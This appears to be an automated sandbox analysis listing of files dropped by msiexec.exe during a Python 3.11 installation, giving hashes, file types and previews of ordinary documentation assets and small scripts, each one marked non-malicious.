                                                                                                                                SHA-512:B77DEC05CFDFC91E2F0F353FD65EE6C6D764424F519A9DDC92C138F8F3A313C091BA6A9F451A6A85084D5D40858E0E83CE175526B2B859D5A94FCB31A476E0E3
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>..<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">.. <ShortName>Python</ShortName>.. <Description>Search Python 3.11.0 documentation</Description>.. <InputEncoding>utf-8</InputEncoding>.. <Url type="text/html" method="get".. template="https://docs.python.org/3.11/search.html?q={searchTerms}"/>.. <LongName>Python 3.11.0 documentation</LongName>..<Image height="16" width="16" type="image/x-icon">https://www.python.org/images/favicon16x16.ico</Image>..</OpenSearchDescription>
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 11 x 11, 8-bit grayscale, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):90
                                                                                                                                Entropy (8bit):4.968947818574501
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:yionv//thPl6Cpuy+w56xiH1p:6v/lhP8CMylPp
                                                                                                                                MD5:0D7849FD4D4148B7F78CAB60A087633A
                                                                                                                                SHA1:365ABE63DE063EF2D97D3CAACC43512415B5A835
                                                                                                                                SHA-256:54115199B96A130CBA02147C47C0DEB43DCC9B9F08B5162BBA8642B34980AC63
                                                                                                                                SHA-512:5A34F6B12A015E45E5E3F785D42CF75BD6CB2850C3D0BD85FC59D8EDBAB0A6543A9BBDC0A8A29A7F30BAF96B7780D0F87247B90B9597ED0FD265A8E50612AC4C
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR...............(....!IDATx.c8...g>@.;([..[...U...@l...-!a...@.....IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):695
                                                                                                                                Entropy (8bit):7.472596258888605
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:6v/78f2s/6Tv06F0lqJrtIJJlKLxbZiOO4/xtjNvMuqfrMvmqDBIE3AuzWm2ID:Z2s/6Tn00lt07OO4/xvMuqfe/7J2ID
                                                                                                                                MD5:A721FC7EC672275E257BBBFDE49A4D4E
                                                                                                                                SHA1:88D4484552C4BEAC33D9A0848F523AAA66AAD78C
                                                                                                                                SHA-256:AE173DC4842351FC1C8A551AFBDB58CB2B295490782130DAA4F359A6A80D7256
                                                                                                                                SHA-512:7879A2953ACC3762C9ED55A19357BA12AD0B8BDB4E08DA9E3F21CB2853A481F8B1B4665FD03FB6F932F50450594193224CEEC10FE464B31936416E6584AEE9CD
                                                                                                                                Malicious:false
                                                                                                                                Preview:.PNG........IHDR................a....sRGB.........bKGD..............pHYs.................tIME.....8!.3'^...7IDAT8.e.OHUA...{.w{"....&hS.6.Z...mB*xP..MQ...A. ".)mZH... F.EF......2.....y3g........;.7..]....3i.s.v.M.....U.....}..\...x'.G.j.N,.Z.X.wQ....1 *.{.8k9.g.'v;..;.j./.t?|..[{\...N..j.E.%g..J=M}.W.....}x..v.^.{..Tn.J...N....\}..X.n..zw/..umY5;mg....Q."..SQ.}..,./.|..i...'}..S...@.B.................Wk..)`..j'..J/N.K@...e1M..FN,j}yhb.wp..+..K.S..Xb....@.:........_.=mU.5.EqR.'.4I.N.&t:..c.....j..l.....`zF..6..gu.G.f.pm".......J..(p..o.....q.G.0."....n...:".,.%8...4...+!..`..DoY-...4..,..5.3.......gob.;..3c..]..I...i...C....h.\nf]..................IEND.B`.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2041
                                                                                                                                Entropy (8bit):4.73858862289631
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:rnv4jncfrUrlwFiQy1t/LErdcLpqBpI14P+pz9Y9zcLG6HtSYhLAHt67:I4ASvUSS4Bi14PPe9AW
                                                                                                                                MD5:0AC021A9F4CAE16DF1939CC056AEA75B
                                                                                                                                SHA1:7AB79AB732C9EAC4421A2CE0628E6C09155E5CB2
                                                                                                                                SHA-256:5865BE8BCC0AF888594903EA0112F6C8D923C5726C4081E8C856110CC7339CEF
                                                                                                                                SHA-512:C64D320499DCAE4D3D94ED34FBB741A0335761726276F7FE07D6AD1971742F5F2F3DA25CABBA8A63A7B7BB6CF9CAC9AF71B902CEB03644D2BEE84A24ECFE23E5
                                                                                                                                Malicious:false
                                                                                                                                Preview:<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M7.90472 0.00013087C7.24498 0.00316295 6.61493 0.0588153 6.06056 0.15584C4.42744 0.441207 4.13093 1.0385 4.13093 2.14002V3.59479H7.99018V4.07971H4.13093H2.68259C1.56098 4.07971 0.578874 4.7465 0.271682 6.01495C-0.0826595 7.4689 -0.0983765 8.37618 0.271682 9.89434C0.546011 11.0244 1.20115 11.8296 2.32275 11.8296H3.64965V10.0856C3.64965 8.82574 4.75178 7.71441 6.06056 7.71441H9.91531C10.9883 7.71441 11.8449 6.84056 11.8449 5.77472V2.14002C11.8449 1.10556 10.9626 0.328486 9.91531 0.15584C9.25235 0.046687 8.56447 -0.00290121 7.90472 0.00013087ZM5.81767 1.17017C6.2163 1.17017 6.54184 1.49742 6.54184 1.89978C6.54184 2.30072 6.2163 2.62494 5.81767 2.62494C5.41761 2.62494 5.0935 2.30072 5.0935 1.89978C5.0935 1.49742 5.41761 1.17017 5.81767 1.17017Z" fill="url(#paint0_linear)"/>.<path d="M12.3262 4.07971V5.77472C12.3262 7.08883 11.1998 8.19488 9.9153 8.19488H6.06055C5.00466 8.19488 4.13092 9
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10634
                                                                                                                                Entropy (8bit):4.567648205766356
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:II/rLJBcFt3LRtFjLrmc2bz6sydW1DcEcpCMr16vzoR7Hl6t8TkjZgabLpeHBtLF:t/3JBcF/tFjLrmc2bz6RTzb6sbyg+F6N
                                                                                                                                MD5:165B592E794218726B1EC15D4E3E9EB1
                                                                                                                                SHA1:610A001894DECCF70DF1DD756DDC9E5EF49E8C04
                                                                                                                                SHA-256:0E2D097EC6582B8A0E035A7630AD3052BBB189F3ABEC9CB29822CD92D9ED86AB
                                                                                                                                SHA-512:0048B85E312061C83D84480F3778B1970519B0D54BFFBEFC24244DAD8FE422FA4DCB4ED8C093B8F59B217965F1955A0EF16229F8849CC96ACF3242507765340E
                                                                                                                                Malicious:false
                                                                                                                                Preview:@import url("default.css");..body {. background-color: white;. margin-left: 1em;. margin-right: 1em;.}...mobile-nav,..menu-wrapper {. display: none;.}..div.related {. margin-bottom: 1.2em;. padding: 0.5em 0;. border-bottom: 1px solid #ccc;. margin-top: 0.5em;.}..div.related a:hover {. color: #0095C4;.}..div.related ~ div.related {. border-top: 1px solid #ccc;. border-bottom: none;.}...related .switchers {. display: inline-flex;.}...switchers > div {. margin-right: 5px;.}...version_switcher_placeholder,..language_switcher_placeholder {. padding-left: 5px;. background-color: white;.}...inline-search {. display: inline;.}.form.inline-search input {. display: inline;.}.form.inline-search input[type="submit"] {. width: 40px;.}..div.document {. display: flex;.}..div.sphinxsidebar {. float: none;. position: sticky;. top: 0;. max-height: 100vh;. background-color: #eeeeee;. border-radius: 5px;. line-height: 130%;.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4892
                                                                                                                                Entropy (8bit):5.0714561219032195
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:mkxVA1PLTiV2R3FiVAoiVPyiVIiV3iVcsEVyJ/ZJKomQWcv60dbn6hZ7eKnVusw:mkcWV8kVqVBV7VyVcsEV4kFyySeVusw
                                                                                                                                MD5:4C780ADD0283F134C683C19428B539EE
                                                                                                                                SHA1:B1A50DA44005D20D9E2B502A6283807598DA301F
                                                                                                                                SHA-256:B4CE0A3C690B00B06ACCC101A1AFAA38C867BD444C7D3905979874DBB66D069F
                                                                                                                                SHA-512:9273D9BE8A10A8D74A1D81D31B59A9B6444888FBF93232B2C164D74472E2ADA665E2A1522C4FB2850F51DE363428ECDD3467191886C082B9AB7F454BF38EA7C8
                                                                                                                                Malicious:false
                                                                                                                                Preview:pre { line-height: 125%; }..td.linenos .normal { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..span.linenos { color: inherit; background-color: transparent; padding-left: 5px; padding-right: 5px; }..td.linenos .special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }..span.linenos.special { color: #000000; background-color: #ffffc0; padding-left: 5px; padding-right: 5px; }...highlight .hll { background-color: #ffffcc }...highlight { background: #f8f8f8; }...highlight .c { color: #3D7B7B; font-style: italic } /* Comment */...highlight .err { border: 1px solid #FF0000 } /* Error */...highlight .k { color: #008000; font-weight: bold } /* Keyword */...highlight .o { color: #666666 } /* Operator */...highlight .ch { color: #3D7B7B; font-style: italic } /* Comment.Hashbang */...highlight .cm { color: #3D7B7B; font-style: italic } /* Comment.Multiline */...highlight .cp { color: #9C6500 } /* Comment.Preproc */...h
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16634
                                                                                                                                Entropy (8bit):4.652006329050047
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Ezl6ghsW2yZZY2wE2EDr+KIrGn4GhHtK1KBQo0Rhn2I:e1hs+5PfPZm9
                                                                                                                                MD5:05F73A0168E11448C24FE18115ABEB43
                                                                                                                                SHA1:085C9A1CE909184CAD80EBE894C6EBB3C390CE9A
                                                                                                                                SHA-256:D6B5EE21EDD7B46C029C5111326719DCEC5C5F52368704A93B2D6485CB22414C
                                                                                                                                SHA-512:B57DBF3751EEBDC30FB0657ACC94928B7B027F7741D82CD4E67D0A3B04972ED63946D71B25899743F51F45F441214F74F980606700B0BC701D818525E0D1178D
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*. * searchtools.js. * ~~~~~~~~~~~~~~~~. *. * Sphinx JavaScript utilities for the full-text search.. *. * :copyright: Copyright 2007-2022 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */..if (!Scorer) {. /**. * Simple result scoring code.. */. var Scorer = {. // Implement the following function to further tweak the score for each result. // The function takes a result array [filename, title, anchor, descr, score]. // and returns the new score.. /*. score: function(result) {. return result[4];. },. */.. // query matches the full name of an object. objNameMatch: 11,. // or matches in the last dotted part of the object name. objPartialMatch: 6,. // Additive scores depending on the priority of the object. objPrio: {0: 15, // used to be importantResults. 1: 5, // used to be objectResults. 2: -5}, // used to be unimportantResults. // Used when the priority is not in the m
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4353
                                                                                                                                Entropy (8bit):4.813247295027459
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:F8NJC1UvykJDUTH5kivLkH8vhiV8Rz+vx5VI0/vyv55NuVd2s2kE8A:F8NgeJCHRD+xq/uj2YA
                                                                                                                                MD5:D9D62289B53FDC887C5E50F8D470EBE0
                                                                                                                                SHA1:78840CA3D53A745D697E8506F8A50B931A575592
                                                                                                                                SHA-256:D23C599FC95A194340402CEC351ECC78B946EA27CFF1DA0ECC2B1F8B1A648B1D
                                                                                                                                SHA-512:97B85D1DA0BA4A46D4D22E2A95B57F884C4A8149A798348B2F67C83C509D622CAA28DED35F139268FDB17939E5016C02E673770C9985E5887FC44E37FD2A2000
                                                                                                                                Malicious:false
                                                                                                                                Preview:/*. * sidebar.js. * ~~~~~~~~~~. *. * This script makes the Sphinx sidebar collapsible. This is a slightly. * modified version of Sphinx's own sidebar.js.. *. * .sphinxsidebar contains .sphinxsidebarwrapper. This script adds in. * .sphixsidebar, after .sphinxsidebarwrapper, the #sidebarbutton used to. * collapse and expand the sidebar.. *. * When the sidebar is collapsed the .sphinxsidebarwrapper is hidden and the. * width of the sidebar and the margin-left of the document are decreased.. * When the sidebar is expanded the opposite happens. This script saves a. * per-browser/per-session cookie used to remember the position of the sidebar. * among the pages. Once the browser is closed the cookie is deleted and the. * position reset to the default (expanded).. *. * :copyright: Copyright 2007-2011 by the Sphinx team, see AUTHORS.. * :license: BSD, see LICENSE for details.. *. */..$(function() {. // global elements used by the functions.. // the 'sidebarbutton' element is defined as gl
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):68420
                                                                                                                                Entropy (8bit):4.7888312487578935
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:uFgPYMzG1NxVbecjNTUtHAJ3l1rQPYBD9Vf5Cb:TPYMzGDbeUKpAJA+Cb
                                                                                                                                MD5:9EB878EE889F880ACA37CA63E4195AB4
                                                                                                                                SHA1:7202BC60A439A2F82A483F4DE237CE22803EF8E2
                                                                                                                                SHA-256:CC10F799CD0F6B65F95C4012445497E5BA3CB9F51964A9468940B27BDE98B487
                                                                                                                                SHA-512:79C072382C1FDD135D7E10CD5E2E002F76D4D54A7ED85BD45BCBA44E2392902AB1F39E540049FAABDF79E98281953B3D722647B930FEDDC89A4F0AEA98E075BB
                                                                                                                                Malicious:false
                                                                                                                                Preview:(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :. typeof define === 'function' && define.amd ? define('underscore', factory) :. (global = typeof globalThis !== 'undefined' ? globalThis : global || self, (function () {. var current = global._;. var exports = global._ = factory();. exports.noConflict = function () { global._ = current; return exports; };. }()));.}(this, (function () {. // Underscore.js 1.13.1. // https://underscorejs.org. // (c) 2009-2021 Jeremy Ashkenas, Julian Gonggrijp, and DocumentCloud and Investigative Reporters & Editors. // Underscore may be freely distributed under the MIT license... // Current version.. var VERSION = '1.13.1';.. // Establish the root object, `window` (`self`) in the browser, `global`. // on the server, or `this` in some virtual machines. We use `self`. // instead of `window` for `WebWorker` support.. var root = typeof self == 'object
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (18996)
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19530
                                                                                                                                Entropy (8bit):5.203574242965945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:zeOIhxIEKCfc5uFWT4LRn8jgZOQV72xF7CaNQWB/O9a/RQ0eb:qOI/IE3c5EWT6RcemF7CaNQWm0/RFc
                                                                                                                                MD5:426E8E61DD81D4C6F9C17F1150AD07CE
                                                                                                                                SHA1:BDF0B85756EE2B41FF1E0C86960BF14C740C34CE
                                                                                                                                SHA-256:218FB1C1FC72E9AF6B866F430BE2A67FA376392B4DB2F4DBF32772671B6AE55C
                                                                                                                                SHA-512:66E3A3CAAAB8D3DFAAEAE738F548811777D37B24723FC42CD097FFEC5C47E4B7E1A81333AD1E5CC1BA43038060CD2A3CF38C3AABFFA835D21E1DE9CEAA12121B
                                                                                                                                Malicious:false
                                                                                                                                Preview:!function(n,r){"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,function(){var t=n._,e=n._=r();e.noConflict=function(){return n._=t,e}}())}(this,(function(){.// Underscore.js 1.13.1.// https://underscorejs.org.// (c) 2009-2021 Jeremy Ashkenas, Julian Gonggrijp, and DocumentCloud and Investigative Reporters & Editors.// Underscore may be freely distributed under the MIT license..var n="1.13.1",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},t=Array.prototype,e=Object.prototype,u="undefined"!=typeof Symbol?Symbol.prototype:null,o=t.push,i=t.slice,a=e.toString,f=e.hasOwnProperty,c="undefined"!=typeof ArrayBuffer,l="undefined"!=typeof DataView,s=Array.isArray,p=Object.keys,v=Object.create,h=c&&ArrayBuffer.isView,y=isNaN,d=isFinite,g=!{toString:null}.pro
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (343), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12273
                                                                                                                                Entropy (8bit):4.806803158786314
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:1ojqD3XmAVMxNr0ne8MSYJ/7YQ4tVMKkcns8MSYS76kqW+0:fD32rn0ne8M3Jzl44bcns8M3S76kqW+0
                                                                                                                                MD5:51F1554E1BABBCA0A796E56B25A157A2
                                                                                                                                SHA1:7CEC356407E7D1FECA5F2C394400DE82F882474F
                                                                                                                                SHA-256:8DA607BD892FB2864AD17FB0ABC591370FCA9BD2F4637988B7CD66207A01F81D
                                                                                                                                SHA-512:E807A7DCF99773D1B11755D2FCA08EF8C682995D9879CD68A262D16BDA1EA1B55ACEB37554AC1C7CEED6014C2FA79462716897C8A15DAF4C403B2205893FBF86
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<!DOCTYPE html>....<html>.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />.... <title>About these documents &#8212; Python 3.11.0 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?2022.1" />.. .. <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>.. <script src="_static/jquery.js"></script>.. <script src="_static/underscore.js"></script>.. <script src="_static/doctools.js"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search within Python 3.11.0 documentation"..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (343), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17111
                                                                                                                                Entropy (8bit):4.879107646894312
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:sD32BqenF8MKhZOPfDHYMeFb66nJ8MKS76kqW+0:sDGBRKMQZOPfDKFb/GM976x0
                                                                                                                                MD5:881274B39B195CA40F7F43A6C0C54570
                                                                                                                                SHA1:5CF5CC755EC9D73C91F7F18E3F9901450E60E02D
                                                                                                                                SHA-256:6FD1B5652F7DC112F10FD3DBB6CDACAC3E1FAFB5A485475378730ADF3F6D5E35
                                                                                                                                SHA-512:5EEF1F70077E83A223F17F3AC54A1271913793D53B3FF9B98E598FBBC89051B7D6C95AE3C27AC5F6A6FBD2023FB54F982AD82DCFD681E5582C950321816C0050
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<!DOCTYPE html>....<html>.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />.... <title>Dealing with Bugs &#8212; Python 3.11.0 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?2022.1" />.. .. <script data-url_root="./" id="documentation_options" src="_static/documentation_options.js"></script>.. <script src="_static/jquery.js"></script>.. <script src="_static/underscore.js"></script>.. <script src="_static/doctools.js"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search within Python 3.11.0 documentation"..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (343), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14161
                                                                                                                                Entropy (8bit):4.840622966272758
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:1atJ5YmXmhMKMggnqzMfYiqKskqMn6wnIzMftiz76kqW+0:AYm2SKgnqzMjBr6wnIzMMz76kqW+0
                                                                                                                                MD5:BD79971BA7AAAA903CC936F7AD774106
                                                                                                                                SHA1:3C85EFB17B39C8B6B1582B2243821AC43C922E16
                                                                                                                                SHA-256:F4D03ACCDDE2C6FBF1ADE3B365E872E316D769138869C2FD5C48A6E9FF054AED
                                                                                                                                SHA-512:DC2E21814A5E6A423685753B25B433235DFC1A64240EF8A99155CF44418DED01BE6395E66062E87FBC7910CC47E9B547B70FB57C5354075D8AB26396C555AAF6
                                                                                                                                Malicious:false
                                                                                                                                Preview:..<!DOCTYPE html>....<html>.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" />.... <title>Abstract Objects Layer &#8212; Python 3.11.0 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_static/pygments.css" />.. <link rel="stylesheet" type="text/css" href="../_static/pydoctheme.css?2022.1" />.. .. <script data-url_root="../" id="documentation_options" src="../_static/documentation_options.js"></script>.. <script src="../_static/jquery.js"></script>.. <script src="../_static/underscore.js"></script>.. <script src="../_static/doctools.js"></script>.. .. <script src="../_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search within Python 3.
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5365
                                                                                                                                Entropy (8bit):4.754759755158243
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:iO+uujd+ShBzIhGL45k3XYgvSEMkQFne2bfYHDg:D+uSEkEknNvSEMkTkAHDg
                                                                                                                                MD5:7DB961704AB133D2B2794B860DD043BD
                                                                                                                                SHA1:8DEC0F7EE73F28B789E2D42C85F23A1E52AA361F
                                                                                                                                SHA-256:BF11D13B6C9B2B8706BE425ADDF399965738622BB4CC553217BE16399C51D51A
                                                                                                                                SHA-512:EF15AEE508686B41348B66956EAB6B863BA789063E8ADC3D917AA75AFFFE664BB22EFDB73242BE24BA7C595B235EF43688F314CB76B9759119597D8175F96384
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Record of phased-in incompatible language changes.....Each line is of the form:.... FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",".. CompilerFlag ")"....where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples..of the same form as sys.version_info:.... (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int.. PY_MINOR_VERSION, # the 1; an int.. PY_MICRO_VERSION, # the 0; an int.. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string.. PY_RELEASE_SERIAL # the 3; an int.. )....OptionalRelease records the first release in which.... from __future__ import FeatureName....was accepted.....In the case of MandatoryReleases that have not yet occurred,..MandatoryRelease predicts the release in which the feature will become part..of the language.....Else MandatoryRelease records when the feature became part of the language;..in releases at or after that, modules no longer need.... from __futur
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):243
                                                                                                                                Entropy (8bit):4.806296080325184
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:KMq2mxX0lRVhVR7eVlRV+VbyVVlRZFGV/tSWrVPEAjajR:uqphVRSV5+VeVNFGV/ti2aN
                                                                                                                                MD5:6424E014248CE1FDA1861AD7EF8D054D
                                                                                                                                SHA1:DE1273A0BF0C9602A93605B59BEFCC3F218BFF30
                                                                                                                                SHA-256:427508A24710B22154D6E772D50E6720DA2E8B2DCF15F70593F3BC80EED1C87D
                                                                                                                                SHA-512:16D07D86803189F73797DF1C326ABA84F12478D8D77A8F23F0D04880542168CAE9A59926CD19EB5B496EEF872CC0FD6C12178DC784B1F5C7BC5DC76983271CB8
                                                                                                                                Malicious:false
                                                                                                                                Preview:initialized = True....class TestFrozenUtf8_1:.. """\u00b6"""....class TestFrozenUtf8_2:.. """\u03c0"""....class TestFrozenUtf8_4:.. """\U0001f600"""....def main():.. print("Hello world!")....if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):104
                                                                                                                                Entropy (8bit):4.383717157372507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KMRMExBFoxXJZy5MLAocrVPGhAj5EMCCFO:KMq2mxXXySWrVPEAjajR
                                                                                                                                MD5:D577C4CFEC75304F5F339DA0E128DB83
                                                                                                                                SHA1:9542419CA9315D30602F4FE9C9C95D0A2F72BC4F
                                                                                                                                SHA-256:B9BA5F17A049779747DBC8B17FA318FAB67875BE829994ED437C81D0666A88DC
                                                                                                                                SHA-512:84720AC8D037B6FD51B08F63019F17F1B212069D3BF53C18FECAFF4C8FAC0C6BCE4F73617A7C63FA9A8FD2BA32BA56C11C0A88484AA5E113F33CA768D6EF7BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:initialized = True....def main():.. print("Hello world!")....if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):104
                                                                                                                                Entropy (8bit):4.383717157372507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:KMRMExBFoxXJZy5MLAocrVPGhAj5EMCCFO:KMq2mxXXySWrVPEAjajR
                                                                                                                                MD5:D577C4CFEC75304F5F339DA0E128DB83
                                                                                                                                SHA1:9542419CA9315D30602F4FE9C9C95D0A2F72BC4F
                                                                                                                                SHA-256:B9BA5F17A049779747DBC8B17FA318FAB67875BE829994ED437C81D0666A88DC
                                                                                                                                SHA-512:84720AC8D037B6FD51B08F63019F17F1B212069D3BF53C18FECAFF4C8FAC0C6BCE4F73617A7C63FA9A8FD2BA32BA56C11C0A88484AA5E113F33CA768D6EF7BFE
                                                                                                                                Malicious:false
                                                                                                                                Preview:initialized = True....def main():.. print("Hello world!")....if __name__ == '__main__':.. main()..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3480
                                                                                                                                Entropy (8bit):5.0857010487934
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:108JH5E4/o5I2Wqpt8u/3hqCbuwAknVbRo61RmT+se8R2HR7:10coW+3I4uwfnVbRo2Rk4R7
                                                                                                                                MD5:17B77AB37F9616DEE80F3C783D6A0CD9
                                                                                                                                SHA1:F42A17B04335A43023803442F3E07BAAE6C112CF
                                                                                                                                SHA-256:7495858F28C7012BF48FAB29F2A42B1743ECF4E428FDFC4D7F0355D2DA6E9C24
                                                                                                                                SHA-512:E31EE9E5AAB6BF2C606ECEE4FA168B0D3218342CF0655C8971780BC82A7077ADE083774E4949733135F2ADA2D96D14B383A2AB38B2FAE3962C8DA62EA298B1F8
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Shared AIX support functions."""....import sys..import sysconfig....try:.. import subprocess..except ImportError: # pragma: no cover.. # _aix_support is used in distutils by setup.py to build C extensions,.. # before subprocess dependencies like _posixsubprocess are available... import _bootsubprocess as subprocess......def _aix_tag(vrtl, bd):.. # type: (List[int], int) -> str.. # Infer the ABI bitwidth from maxsize (assuming 64 bit as the default).. _sz = 32 if sys.maxsize == (2**31-1) else 64.. _bd = bd if bd != 0 else 9988.. # vrtl[version, release, technology_level].. return "aix-{:1x}{:1d}{:02d}-{:04d}-{}".format(vrtl[0], vrtl[1], vrtl[2], _bd, _sz)......# extract version, release and technology level from a VRMF string..def _aix_vrtl(vrmf):.. # type: (str) -> List[int].. v, r, tl = vrmf.split(".")[:3].. return [int(v[-1]), int(r), int(tl)]......def _aix_bos_rte():.. # type: () -> Tuple[str, int].. """.. Return a Tuple[str, int]
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2772
                                                                                                                                Entropy (8bit):4.431404312247647
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:FEDKp2B5JX6YOo/SEP5iFYoe5MCyNNlYbqMgwOF8zCEuo/+5q9Wam:uDr9X6MEKb9gwuojFm
                                                                                                                                MD5:977B851F41A21AB6862A9527A8490AB5
                                                                                                                                SHA1:9F882F4FFF8CB58CDF9F874A7E74DBEAE824E430
                                                                                                                                SHA-256:4C817B46039F0162413A4384EFFEA304E933307E9B40527C8AB02FB64079AB7D
                                                                                                                                SHA-512:1B24DAA30A11A1F8E4A455558E4B2D74EBFCBF7EC1275F3D1C54EB02AD820CA037D98166B6B53C8350D9BDDAEDF0BD5EFD3E508EE6AEF186FA5BDC3193C9A374
                                                                                                                                Malicious:false
